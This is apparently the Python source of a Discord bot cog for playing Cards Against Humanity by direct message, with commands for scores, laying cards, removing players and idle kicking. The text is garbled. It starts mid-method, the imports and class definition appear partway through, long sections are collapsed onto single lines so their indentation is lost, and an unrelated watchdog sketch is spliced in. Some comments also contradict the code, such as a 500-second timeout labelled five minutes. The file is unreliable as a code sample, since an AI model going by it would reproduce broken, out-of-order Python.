                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        stat_embed = discord.Embed(color=discord.Color.purple())
        stat_embed.set_author(name="Current Score")
        stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame['ID']}")
        await ctx.author.send(embed=stat_embed)
        users = sorted(userGame["Members"], key=lambda card: int(card["Points"]), reverse=True)
        msg = ""
        i = 0
        if len(users) > 10:
            msg += f"__10 of {len(users)} Players:__\n\n"
        else:
            msg += "__Players:__\n\n"
        for user in users:
            i += 1
            if i > 10:
                break
            if user["Points"] == 1:
                if user["User"]:
                    # Person
                    msg += f"{i}. *{self.displayname(user['User'])}* - 1 point\n"
                else:
                    # Bot
                    msg += f"{i}. *{self.botName} ({user['ID']})* - 1 point\n"
            else:
                if user["User"]:
                    # Person
                    msg += f"{i}. *{self.displayname(user['User'])}* - {user['Points']} points\n"
                else:
                    # Bot
                    msg += f"{i}. *{self.botName} ({user['ID']})* - {user['Points']} points\n"
        await ctx.author.send(msg)

    @commands.command()
    async def laid(self, ctx):
        """Shows who laid their cards and who hasn't."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        stat_embed = discord.Embed(color=discord.Color.purple())
        stat_embed.set_author(name="Card Check")
        stat_embed.set_footer(text=f"Cards Against Humanity - id: {userGame['ID']}")
        await ctx.author.send(embed=stat_embed)
        users = sorted(userGame["Members"], key=lambda card: int(card["Laid"]))
        msg = ""
        i = 0
        if len(users) > 10:
            msg += f"__10 of {len(users)} Players:__\n\n"
        else:
            msg += "__Players:__\n\n"
        for user in users:
            if len(userGame["Members"]) >= self.minMembers:
                if user == userGame["Members"][userGame["Judge"]]:
                    continue
            i += 1
            if i > 10:
                break
            if user["Laid"]:
                if user["User"]:
                    # Person
                    msg += f"{i}. *{self.displayname(user['User'])}* - Cards are in.\n"
                else:
                    # Bot
                    msg += f"{i}. *{self.botName} ({user['ID']})* - Cards are in.\n"
            else:
                if user["User"]:
                    # Person
                    msg += f"{i}. *{self.displayname(user['User'])}* - Waiting for cards...\n"
                else:
                    # Bot
                    msg += f"{i}. *{self.botName} ({user['ID']})* - Waiting for cards...\n"
        await ctx.author.send(msg)

    @commands.command()
    async def removeplayer(self, ctx, *, name=None):
        """Removes a player from the game. Can only be done by the player who created the game."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        botCount = 0
        for member in userGame["Members"]:
            if member["IsBot"]:
                botCount += 1
                continue
            if member["User"] == ctx.author:
                if not member["Creator"]:
                    # You didn't make this game
                    msg = "Only the player that created the game can remove players."
                    await ctx.author.send(msg)
                    return
                member["Time"] = int(time.time())
        # We are the creator - let's find who to remove
        if name == None:
            # Nobody named!
            msg = "Okay, I removed... no one from the game..."
            await ctx.author.send(msg)
            return
        # Let's get the person either by name, or by id
        nameID = "".join(list(filter(str.isdigit, name)))
        toRemove = False
        for member in userGame["Members"]:
            toRemove = False
            if member["IsBot"]:
                continue
            if name.lower() == self.displayname(member["User"]).lower():
                # Got em!
                toRemove = True
            elif nameID == str(member["ID"]):
                # Got em!
                toRemove = True
            if toRemove:
                await self.removeMember(member["ID"])
                break
        # await self.nextPlay(ctx, userGame)
        if toRemove:
            """# Start the game loop
            event = userGame['NextHand']
            self.bot.loop.call_soon_threadsafe(event.set)"""
            # Player was removed - try to handle it calmly...
            await self.checkSubmissions(ctx, userGame)
        else:
            msg = f"I couldn't locate that player on this game. If you're trying to remove a bot, try the `{ctx.prefix}removebot [id]` command."
            return await ctx.author.send(msg)

    @commands.command()
    async def flushhand(self, ctx):
        """Flushes the cards in your hand - can only be done once per game."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        if userGame["Judge"] == -1:
            msg = "The game hasn't started yet. Probably not worth it to flush your hand before you get it..."
            await ctx.author.send(msg)
            return
        for member in userGame["Members"]:
            if member["IsBot"]:
                continue
            if member["User"] == ctx.author:
                member["Time"] = int(time.time())
                # Found us!
                if member["Refreshed"]:
                    # Already flushed their hand
                    msg = "You have already flushed your hand this game."
                    await ctx.author.send(msg)
                    return
                else:
                    member["Hand"] = []
                    await self.drawCards(member["ID"])
                    member["Refreshed"] = True
                    msg = "Flushing your hand!"
                    await ctx.author.send(msg)
                    await self.showHand(ctx, ctx.author)
                    return

    @commands.command()
    async def idlekick(self, ctx, *, setting=None):
        """Sets whether or not to kick members if idle for 5 minutes or more. Can only be done by the player who created the game."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        botCount = 0
        for member in userGame["Members"]:
            if member["IsBot"]:
                botCount += 1
                continue
            if member["User"] == ctx.author:
                if not member["Creator"]:
                    # You didn't make this game
                    msg = "Only the player that created the game can change this setting."
                    await ctx.author.send(msg)
                    return
        # We are the creator - let's check the setting
        if setting == None:
            # Output idle kick status
            if userGame["Timeout"]:
                await ctx.message.channel.send("Idle kick is enabled.")
            else:
                await ctx.message.channel.send("Idle kick is disabled.")
            return
        elif setting.lower() == "yes" or setting.lower() == "on" or setting.lower() == "true":
            setting = True
        elif setting.lower() == "no" or setting.lower() == "off" or setting.lower() == "false":
            setting = False
        else:
            setting = None
        if setting == True:
            if userGame["Timeout"] == True:
                msg = "Idle kick remains enabled."
            else:
                msg = "Idle kick now enabled."
for member in userGame["Members"]: member["Time"] = int(time.time()) else: if userGame["Timeout"] == False: msg = "Idle kick remains disabled." else: msg = "Idle kick now disabled." userGame["Timeout"] = setting await ctx.message.channel.send(msg) @commands.command() async def cahcredits(self, ctx): """Code credits.""" await ctx.send( "```\nThis cog is made possible by CorpBot.\nPlease visit https://github.com/corpnewt/CorpBot.py for more information.\n```" )
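
# The idle-kick toggle above works because every member dict carries a "Time"
# stamp that is refreshed on each interaction, while checkUserTimeout compares
# it against userTimeout on a fixed interval. A minimal sketch of that
# watchdog pattern follows; the `members` list and the inline removal are
# illustrative stand-ins for the cog's real structures and removeMember().

import asyncio
import time


async def idle_watchdog(members, timeout=300, interval=30, warn_window=60):
    """Warn, then drop, members whose last activity exceeds the timeout."""
    while True:
        await asyncio.sleep(interval)
        now = int(time.time())
        for member in list(members):  # iterate a copy so removal is safe
            idle = now - member["Time"]
            if idle >= timeout:
                members.remove(member)  # stand-in for removeMember()
            elif idle >= timeout - warn_window:
                print(f"warning {member['ID']}: kicked in {timeout - idle}s")
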
import asyncio import discord import html import json import random import time from random import shuffle from redbot.core import commands from redbot.core.data_manager import bundled_data_path class CardsAgainstHumanity(commands.Cog): def __init__(self, bot): self.bot = bot self.games = [] self.maxBots = ( 5 # Max number of bots that can be added to a game - don't count toward max players ) self.maxPlayers = 10 # Max players for ranjom joins self.maxDeadTime = 3600 # Allow an hour of dead time before killing a game self.checkTime = 300 # 5 minutes between dead time checks self.winAfter = 10 # 10 wins for the game self.botWaitMin = ( 5 # Minimum number of seconds before the bot makes a decision (default 5) ) self.botWaitMax = 30 # Max number of seconds before a bot makes a decision (default 30) self.userTimeout = 500 # 5 minutes to timeout self.utCheck = 30 # Check timeout every 30 seconds self.utWarn = 60 # Warn the user if they have 60 seconds or less before being kicked self.charset = "1234567890" self.botName = "Rando Cardrissian" self.minMembers = 3 self.bot.loop.create_task(self.checkDead()) self.bot.loop.create_task(self.checkUserTimeout()) def cleanJson(self, json): json = html.unescape(json) # Clean out html formatting json = json.replace("_", "[blank]") json = json.replace("<br>", "\n") json = json.replace("<br/>", "\n") json = json.replace("<i>", "*") json = json.replace("</i>", "*") return json def displayname(self, member: discord.Member): # A helper function to return the member's display name nick = name = None try: nick = member.nick except AttributeError: pass try: name = member.name except AttributeError: pass if nick: return nick if name: return name return None def memberforname(self, name, server): # Check nick first - then name for member in server.members: if member.nick: if member.nick.lower() == name.lower(): return member for member in server.members: if member.name.lower() == name.lower(): return member # No member yet - try ID memID = "".join(list(filter(str.isdigit, name))) newMem = self.memberforid(memID, server) if newMem: return newMem return None @staticmethod def memberforid(checkid, server): for member in server.members: if str(member.id) == str(checkid): return member return None def getreadabletimebetween(self, first, last): # A helper function to make a readable string between two times timeBetween = int(last - first) weeks = int(timeBetween / 604800) days = int((timeBetween - (weeks * 604800)) / 86400) hours = int((timeBetween - (days * 86400 + weeks * 604800)) / 3600) minutes = int((timeBetween - (hours * 3600 + days * 86400 + weeks * 604800)) / 60) seconds = int(timeBetween - (minutes * 60 + hours * 3600 + days * 86400 + weeks * 604800)) msg = "" if weeks > 0: if weeks == 1: msg = f"{msg}{str(weeks)} week, " else: msg = f"{msg}{str(weeks)} weeks, " if days > 0: if days == 1: msg = f"{msg}{str(days)} day, " else: msg = f"{msg}{str(days)} days, " if hours > 0: if hours == 1: msg = f"{msg}{str(hours)} hour, " else: msg = f"{msg}{str(hours)} hours, " if minutes > 0: if minutes == 1: msg = f"{msg}{str(minutes)} minute, " else: msg = f"{msg}{str(minutes)} minutes, " if seconds > 0: if seconds == 1: msg = f"{msg}{str(seconds)} second, " else: msg = f"{msg}{str(seconds)} seconds, " if not msg: return "0 seconds" else: return msg[:-2] async def checkUserTimeout(self): while True: # Wait first - then check await asyncio.sleep(self.utCheck) for game in self.games: if not game["Timeout"]: continue if len(game["Members"]) >= self.minMembers: # Game is started 
for member in game["Members"]: if member["IsBot"]: continue if game["Judging"]: if not member == game["Members"][game["Judge"]]: # Not the judge - don't hold against the user member["Time"] = int(time.time()) continue else: # Not judging if member == game["Members"][game["Judge"]]: # The judge - don't hold that against them member["Time"] = int(time.time()) continue currentTime = int(time.time()) userTime = member["Time"] downTime = currentTime - userTime # Check if downTime results in a kick if downTime >= self.userTimeout: # You gettin kicked, son. await self.removeMember(member["User"]) self.checkGame(game) continue # Check if downTime is in warning time if downTime >= (self.userTimeout - self.utWarn): # Check if we're at warning phase if self.userTimeout - downTime >= (self.utWarn - self.utCheck): kickTime = self.userTimeout - downTime if kickTime % self.utCheck: # Kick time isn't exact time - round out to the next loop kickTime = kickTime - (kickTime % self.utCheck) + self.utCheck # Warning time! timeString = self.getreadabletimebetween(0, kickTime) await member["User"].send( f"**WARNING** - You will be kicked from the game if you do not make a move in *{timeString}!*" ) else: for member in game["Members"]: # Reset timer member["Time"] = int(time.time()) async def checkDead(self): while True: # Wait first - then check await asyncio.sleep(self.checkTime) for game in self.games: gameTime = game["Time"] currentTime = int(time.time()) timeRemain = currentTime - gameTime if timeRemain > self.maxDeadTime: # Game is dead - quit it and alert members for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None continue await member["User"].send( f"Game id: *{game['ID']}* has been closed due to inactivity." 
) # Set running to false game["Running"] = False self.games.remove(game) async def checkPM(self, message): # Checks if we're talking in PM, and if not - outputs an error if isinstance(message.channel, discord.abc.PrivateChannel): # PM return True else: # Not in PM await message.channel.send("Cards Against Humanity commands must be run in PM.") return False def randomID(self, length=8): # Create a random id that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for game in self.games: if game["ID"] == newID: exists = True break if not exists: break return newID def randomBotID(self, game, length=4): # Returns a random id for a bot that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for member in game["Members"]: if member["ID"] == newID: exists = True break if not exists: break return newID async def userGame(self, user): # Returns the game the user is currently in if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id for game in self.games: for member in game["Members"]: if member["ID"] == user: # Found our user return game return None def gameForID(self, id): # Returns the game with the passed id for game in self.games: if game["ID"] == id: return game return None async def removeMember(self, user, game=None): if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id outcome = False removed = None if not game: game = await self.userGame(user) if game: for member in game["Members"]: if member["ID"] == user: removed = member outcome = True judgeChanged = False # Reset judging flag to retrigger actions game["Judging"] = False # Get current Judge - only if game has started if len(game["Members"]) >= self.minMembers: judge = game["Members"][game["Judge"]] game["Members"].remove(member) # Check if we're removing the current judge if judge == member: # Judge will change judgeChanged = True # Find out if our member was the last in line if game["Judge"] >= len(game["Members"]): game["Judge"] = 0 # Reset judge var judge = game["Members"][game["Judge"]] else: # Judge didn't change - so let's reset judge index index = game["Members"].index(judge) game["Judge"] = index else: judge = None # Just remove the member game["Members"].remove(member) if member["Creator"]: # We're losing the game creator - pick a new one for newCreator in game["Members"]: if not newCreator["IsBot"]: newCreator["Creator"] = True await newCreator["User"].send( "The creator of this game left. **YOU** are now the creator." ) break # Remove submissions for sub in game["Submitted"]: # Remove deleted member and new judge's submissions if sub["By"] == member or sub["By"] == judge: # Found it! 
game["Submitted"].remove(sub) break if member["IsBot"]: if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None else: await member["User"].send( f"**You were removed from game id:** ***{game['ID']}.***" ) # Removed, no need to finish the loop break if not outcome: return outcome # We removed someone - let's tell the world for member in game["Members"]: if member["IsBot"]: continue if removed["IsBot"]: msg = f"***{self.botName} ({removed['ID']})*** **left the game - reorganizing...**" else: msg = f"***{self.displayname(removed['User'])}*** **left the game - reorganizing...**" # Check if the judge changed if judgeChanged: # Judge changed newJudge = game["Members"][game["Judge"]] if newJudge["IsBot"]: msg += f"\n\n***{self.botName} ({newJudge['ID']})*** **is now judging!**" # Schedule judging task else: if newJudge == member: msg += "\n\n***YOU*** **are now judging!**" else: msg += f"\n\n***{newJudge['User']}*** **is now judging!**" await member["User"].send(msg) return game def checkGame(self, game): for member in game["Members"]: if not member["IsBot"]: return True # If we got here - only bots, or empty game # Kill all bots' loops for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None # Set running to false game["Running"] = False self.games.remove(game) return False async def typing(self, game, typeTime=5): # Allows us to show the bot typing waitTime = random.randint(self.botWaitMin, self.botWaitMax) preType = waitTime - typeTime if preType > 0: await asyncio.sleep(preType) for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(typeTime) else: for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(waitTime) async def botPick(self, ctx, bot, game): # Has the bot pick their card blackNum = game["BlackCard"]["Pick"] if blackNum == 1: cardSpeak = "card" else: cardSpeak = "cards" i = 0 cards = [] while i < blackNum: randCard = random.randint(0, len(bot["Hand"]) - 1) cards.append(bot["Hand"].pop(randCard)["Text"]) i += 1 await self.typing(game) # Make sure we haven't laid any cards if bot["Laid"] == False and game["Judging"] == False: newSubmission = {"By": bot, "Cards": cards} game["Submitted"].append(newSubmission) # Shuffle cards shuffle(game["Submitted"]) bot["Laid"] = True game["Time"] = currentTime = int(time.time()) await self.checkSubmissions(ctx, game, bot) async def botPickWin(self, ctx, game): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: # Judge is a bot - and all cards are in! await self.typing(game) # Pick a winner winner = random.randint(0, totalUsers - 1) await self.winningCard(ctx, game, winner) async def checkSubmissions(self, ctx, game, user=None): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) for member in game["Members"]: msg = "" # Is the game running? if len(game["Members"]) < self.minMembers: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): # Task isn't finished - we're on a new hand, cancel it task.cancel() member["Task"] = None continue # not enough members - send the embed stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! 
({len(game['Members'])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {game['ID']}" ) await member["User"].send(embed=stat_embed) continue if member["IsBot"] == True: continue # Check if we have a user if user: blackNum = game["BlackCard"]["Pick"] if blackNum == 1: card = "card" else: card = "cards" if user["IsBot"]: msg = f"*{self.botName} ({user['ID']})* submitted their {card}! " else: if not member == user: # Don't say this to the submitting user msg = f"*{self.displayname(user['User'])}* submitted their {card}! " if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." if len(msg): # We have something to say await member["User"].send(msg) async def checkCards(self, ctx, game): while True: if not game["Running"]: break # wait for 1 second await asyncio.sleep(1) # Check for all cards if len(game["Members"]) < self.minMembers: # Not enough members continue # Enough members - let's check if we're judging if game["Judging"]: continue # Enough members, and not judging - let's check cards totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: game["Judging"] = True # We have enough cards for member in game["Members"]: if member["IsBot"]: continue msg = "All cards have been submitted!" # if await member["User"].send(msg) await self.showOptions(ctx, member["User"]) # Check if a bot is the judge judge = game["Members"][game["Judge"]] if not judge["IsBot"]: continue # task = self.bot.loop.create_task(self.botPickWin(ctx, game)) task = asyncio.ensure_future(self.botPickWin(ctx, game)) judge["Task"] = task async def winningCard(self, ctx, game, card): # Let's pick our card and alert everyone winner = game["Submitted"][card] if winner["By"]["IsBot"]: winnerName = f"{self.botName} ({winner['By']['ID']})" winner["By"]["Points"] += 1 winner["By"]["Won"].append(game["BlackCard"]["Text"]) else: winnerName = self.displayname(winner["By"]["User"]) for member in game["Members"]: if member["IsBot"]: continue stat_embed = discord.Embed(color=discord.Color.gold()) stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") index = game["Members"].index(member) if index == game["Judge"]: stat_embed.set_author(name=f"You picked {winnerName}'s card!") elif member == winner["By"]: stat_embed.set_author(name="YOU WON!!") member["Points"] += 1 member["Won"].append(game["BlackCard"]["Text"]) else: stat_embed.set_author(name=f"{winnerName} won!") if len(winner["Cards"]) == 1: msg = "The **Winning** card was:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) else: msg = "The **Winning** cards were:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) await member["User"].send(embed=stat_embed) await member["User"].send(msg) await asyncio.sleep(0.1) # await self.nextPlay(ctx, game) # Start the game loop event = game["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) game["Time"] = currentTime = int(time.time()) async def gameCheckLoop(self, ctx, game): task = game["NextHand"] while True: if not game["Running"]: break # Clear the pending task task.clear() # Queue up the next hand await self.nextPlay(ctx, game) # Wait until our next clear await task.wait() async def messagePlayers(self, ctx, message, game, judge=False): # Messages all the users on in a game for member in game["Members"]: if member["IsBot"]: continue # Not bots if member is game["Members"][game["Judge"]]: # Is the judge if judge: await member["User"].send(message) else: # Not the judge await 
member["User"].send(message) ################################################ async def showPlay(self, ctx, user): # Creates an embed and displays the current game stats stat_embed = discord.Embed(color=discord.Color.blue()) game = await self.userGame(user) if not game: return # Get the judge's name if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game['Members'][game['Judge']]['ID']})* is" else: judge = f"*{self.displayname(game['Members'][game['Judge']]['User'])}* is" # Get the Black Card try: blackCard = game["BlackCard"]["Text"] blackNum = game["BlackCard"]["Pick"] except Exception: blackCard = "None." blackNum = 0 msg = f"{judge} the judge.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if len(game["Members"]) >= self.minMembers: if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." else: msg += "All cards have been submitted!" await self.showOptions(ctx, user) return if not judge == "**YOU** are": # Judge doesn't need to lay a card if blackNum == 1: # Singular msg += f"\n\nLay a card with `{ctx.prefix}lay [card number]`" elif blackNum > 1: # Plural msg += f"\n\nLay **{blackNum} cards** with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" stat_embed.set_author(name="Current Play") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") await user.send(embed=stat_embed) await user.send(msg) async def showHand(self, ctx, user): # Shows the user's hand in an embed stat_embed = discord.Embed(color=discord.Color.green()) game = await self.userGame(user) if not game: return i = 0 msg = "" points = "? points" for member in game["Members"]: if member["ID"] == user.id: # Got our user if member["Points"] == 1: points = "1 point" else: points = f"{member['Points']} points" for card in member["Hand"]: i += 1 msg += f"{i}. {card['Text']}\n" try: blackCard = f"**{game['BlackCard']['Text']}**" except Exception: blackCard = "**None.**" stat_embed.set_author(name=f"Your Hand - {points}") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") await user.send(embed=stat_embed) await user.send(msg) async def showOptions(self, ctx, user): # Shows the judgement options stat_embed = discord.Embed(color=discord.Color.orange()) game = await self.userGame(user) if not game: return # Add title stat_embed.set_author(name="JUDGEMENT TIME!!") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game['ID']}") await user.send(embed=stat_embed) if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game['Members'][game['Judge']]['ID']})* is" else: judge = f"*{self.displayname(game['Members'][game['Judge']]['User'])}* is" blackCard = game["BlackCard"]["Text"] msg = f"{judge} judging.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" msg += "__Submitted White Cards:__\n\n" i = 0 for sub in game["Submitted"]: i += 1 msg += "{}. {}\n".format(i, " - ".join(sub["Cards"])) if judge == "**YOU** are": msg += f"\nPick a winner with `{ctx.prefix}pick [submission number]`." 
await user.send(msg) async def drawCard(self, game): with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file: deck = json.load(deck_file) # Draws a random unused card and shuffles the deck if needed totalDiscard = len(game["Discard"]) for member in game["Members"]: totalDiscard += len(member["Hand"]) if totalDiscard >= len(deck["whiteCards"]): # Tell everyone the cards were shuffled for member in game["Members"]: if member["IsBot"]: continue user = member["User"] await user.send("Shuffling white cards...") # Shuffle the cards self.shuffle(game) while True: # Random grab a unique card index = random.randint(0, len(deck["whiteCards"]) - 1) if not index in game["Discard"]: game["Discard"].append(index) text = deck["whiteCards"][index] text = self.cleanJson(text) card = {"Index": index, "Text": text} return card def shuffle(self, game): # Adds discards back into the deck game["Discard"] = [] for member in game["Members"]: for card in member["Hand"]: game["Discard"].append(card["Index"]) async def drawCards(self, user, cards=10): if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id # fills the user's hand up to number of cards game = await self.userGame(user) for member in game["Members"]: if member["ID"] == user: # Found our user - let's draw cards i = len(member["Hand"]) while i < cards: # Draw unique cards until we fill our hand newCard = await self.drawCard(game) member["Hand"].append(newCard) i += 1 async def drawBCard(self, game): with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file: deck = json.load(deck_file) # Draws a random black card totalDiscard = len(game["BDiscard"]) if totalDiscard >= len(deck["blackCards"]): # Tell everyone the cards were shuffled for member in game["Members"]: if member["IsBot"]: continue user = member["User"] await user.send("Shuffling black cards...") # Shuffle the cards game["BDiscard"] = [] while True: # Random grab a unique card index = random.randint(0, len(deck["blackCards"]) - 1) if not index in game["BDiscard"]: game["BDiscard"].append(index) text = deck["blackCards"][index]["text"] text = self.cleanJson(text) game["BlackCard"] = {"Text": text, "Pick": deck["blackCards"][index]["pick"]} return game["BlackCard"] async def nextPlay(self, ctx, game): # Advances the game if len(game["Members"]) < self.minMembers: stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! ({len(game['Members'])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {game['ID']}" ) for member in game["Members"]: if member["IsBot"]: continue await member["User"].send(embed=stat_embed) return # Find if we have a winner winner = False stat_embed = discord.Embed(color=discord.Color.lighter_grey()) for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): # Task isn't finished - we're on a new hand, cancel it task.cancel() member["Task"] = None if member["Points"] >= self.winAfter: # We have a winner! winner = True if member["IsBot"]: stat_embed.set_author(name=f"{self.botName} ({member['ID']}) is the WINNER!!") else: stat_embed.set_author( name=f"{self.displayname(member['User'])} is the WINNER!!" 
) stat_embed.set_footer(text="Congratulations!") break if winner: for member in game["Members"]: if not member["IsBot"]: await member["User"].send(embed=stat_embed) # Reset all users member["Hand"] = [] member["Points"] = 0 member["Won"] = [] member["Laid"] = False member["Refreshed"] = False return game["Judging"] = False # Clear submitted cards game["Submitted"] = [] # We have enough members if game["Judge"] == -1: # First game - randomize judge game["Judge"] = random.randint(0, len(game["Members"]) - 1) else: game["Judge"] += 1 # Reset the judge if out of bounds if game["Judge"] >= len(game["Members"]): game["Judge"] = 0 # Draw the next black card bCard = await self.drawBCard(game) # Draw cards for member in game["Members"]: member["Laid"] = False await self.drawCards(member["ID"]) # Show hands for member in game["Members"]: if member["IsBot"]: continue await self.showPlay(ctx, member["User"]) index = game["Members"].index(member) if not index == game["Judge"]: await self.showHand(ctx, member["User"]) await asyncio.sleep(0.1) # Have the bots lay their cards for member in game["Members"]: if not member["IsBot"]: continue if member["ID"] == game["Members"][game["Judge"]]["ID"]: continue # Not a human player, and not the judge # task = self.bot.loop.create_task(self.botPick(ctx, member, game))\ task = asyncio.ensure_future(self.botPick(ctx, member, game)) member["Task"] = task # await self.botPick(ctx, member, game) @commands.command() async def game(self, ctx, *, message=None): """Displays the game's current status.""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) await self.showPlay(ctx, ctx.author) @commands.command() async def chat(self, ctx, *, message=None): """Broadcasts a message to the other players in your game.""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) if message == None: msg = "Ooookay, you say *nothing...*" return await ctx.author.send(msg) msg = f"*{ctx.author.name}* says: {message}" for member in userGame["Members"]: if member["IsBot"]: continue # Tell them all!! if not member["User"] == ctx.author: # Don't tell yourself await member["User"].send(msg) else: # Update member's time member["Time"] = int(time.time()) await ctx.author.send("Message sent!") @commands.command() async def lay(self, ctx, *, card=None): """Lays a card or cards from your hand. If multiple cards are needed, separate them by a comma (1,2,3).""" if not await self.checkPM(ctx.message): return userGame = await self.userGame(ctx.author) if not userGame: msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." return await ctx.author.send(msg) userGame["Time"] = int(time.time()) for member in userGame["Members"]: if member["User"] == ctx.author: member["Time"] = int(time.time()) user = member index = userGame["Members"].index(member) if index == userGame["Judge"]: await ctx.author.send( "You're the judge. You don't get to lay cards this round." 
                )
                return
        for submit in userGame["Submitted"]:
            if submit["By"]["User"] == ctx.author:
                await ctx.author.send("You already made your submission this round.")
                return
        if card == None:
            await ctx.author.send("You need to input *something.*")
            return
        card = card.strip()
        card = card.replace(" ", "")
        # Not the judge
        if len(userGame["Members"]) < self.minMembers:
            stat_embed = discord.Embed(color=discord.Color.red())
            stat_embed.set_author(
                name=f"Not enough players to continue! ({len(userGame['Members'])}/{self.minMembers})"
            )
            stat_embed.set_footer(
                text=f"Have other users join with: {ctx.prefix}joincah {userGame['ID']}"
            )
            return await ctx.author.send(embed=stat_embed)
        numberCards = userGame["BlackCard"]["Pick"]
        cards = []
        if numberCards > 1:
            cardSpeak = "cards"
            try:
                card = card.split(",")
            except Exception:
                card = []
            if not len(card) == numberCards:
                await ctx.author.send(
                    f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`"
                )
                return await self.showHand(ctx, ctx.author)
            # Got something
            # Check for duplicates
            if not len(card) == len(set(card)):
                await ctx.author.send(
                    f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`"
                )
                return await self.showHand(ctx, ctx.author)
            # Works
            for c in card:
                try:
                    c = int(c)
                except Exception:
                    await ctx.author.send(
                        f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`"
                    )
                    return await self.showHand(ctx, ctx.author)
                if c < 1 or c > len(user["Hand"]):
                    await ctx.author.send(
                        f"Card numbers must be between 1 and {len(user['Hand'])}."
                    )
                    return await self.showHand(ctx, ctx.author)
                cards.append(user["Hand"][c - 1]["Text"])
            # Remove from user's hand
            card = sorted(card, key=lambda card: int(card), reverse=True)
            for c in card:
                user["Hand"].pop(int(c) - 1)
            # Valid cards
            newSubmission = {"By": user, "Cards": cards}
        else:
            cardSpeak = "card"
            try:
                card = int(card)
            except Exception:
                await ctx.author.send(
                    f"You need to lay a valid card with `{ctx.prefix}lay [card number]`"
                )
                return await self.showHand(ctx, ctx.author)
            if card < 1 or card > len(user["Hand"]):
                await ctx.author.send(f"Card numbers must be between 1 and {len(user['Hand'])}.")
                return await self.showHand(ctx, ctx.author)
            # Valid card
            newSubmission = {"By": user, "Cards": [user["Hand"].pop(card - 1)["Text"]]}
        userGame["Submitted"].append(newSubmission)
        # Shuffle cards
        shuffle(userGame["Submitted"])
        user["Laid"] = True
